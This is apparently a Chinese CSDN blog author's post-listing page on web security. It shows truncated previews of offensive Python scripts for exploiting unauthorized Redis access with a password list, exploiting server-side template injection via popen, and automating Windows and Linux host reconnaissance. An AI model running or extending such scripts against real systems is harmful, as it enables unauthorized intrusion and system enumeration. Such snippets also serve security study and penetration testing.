![](https://img-blog.csdnimg.cn/20201014180756780.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
web安全
鑫达达
这个作者很懒,什么都没留下…
展开
-
redis未授权漏洞利用脚本
#! /usr/bin/env python # _*_ coding:utf-8 _*_ import socket import sys import os class PAYLOAD(object): def __init__(self,ip,port,timeout): self.ip=ip self.port=port self.timeout=timeout self.PASSWORD_DIC=['redis','ro原创 2021-02-14 23:57:41 · 673 阅读 · 0 评论 -
SSTI利用脚本
import requests headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0'} def find_popen(url,payload): '发现popen在object中的位置' num=0 while True: try: payload1 = '{'+payload.form原创 2021-02-14 23:56:48 · 448 阅读 · 1 评论 -
windows信息收集自动化脚本
import os #!encoding=utf-8 class information_collecting(object): def __init__(self): self.system_info_commands={'windows版本信息\n':'ver','windows系统信息\n':'systeminfo','wmic os list brief\n':'wmic os list brief'} self.process_info_command=原创 2021-02-14 23:55:12 · 737 阅读 · 2 评论 -
LINUX自动化信息收集脚本
#!/usr/bin/python3 import os #!encoding=utf-8 class information_collecting(object): def __init__(self): self.system_info_commands={'linux系统信息(uname -a)\n':'uname -a','linux系统信息(cat /etc/issue)\n':'cat /etc/issue','linux发行版本(cat /etc/*-release原创 2021-02-14 23:54:04 · 439 阅读 · 0 评论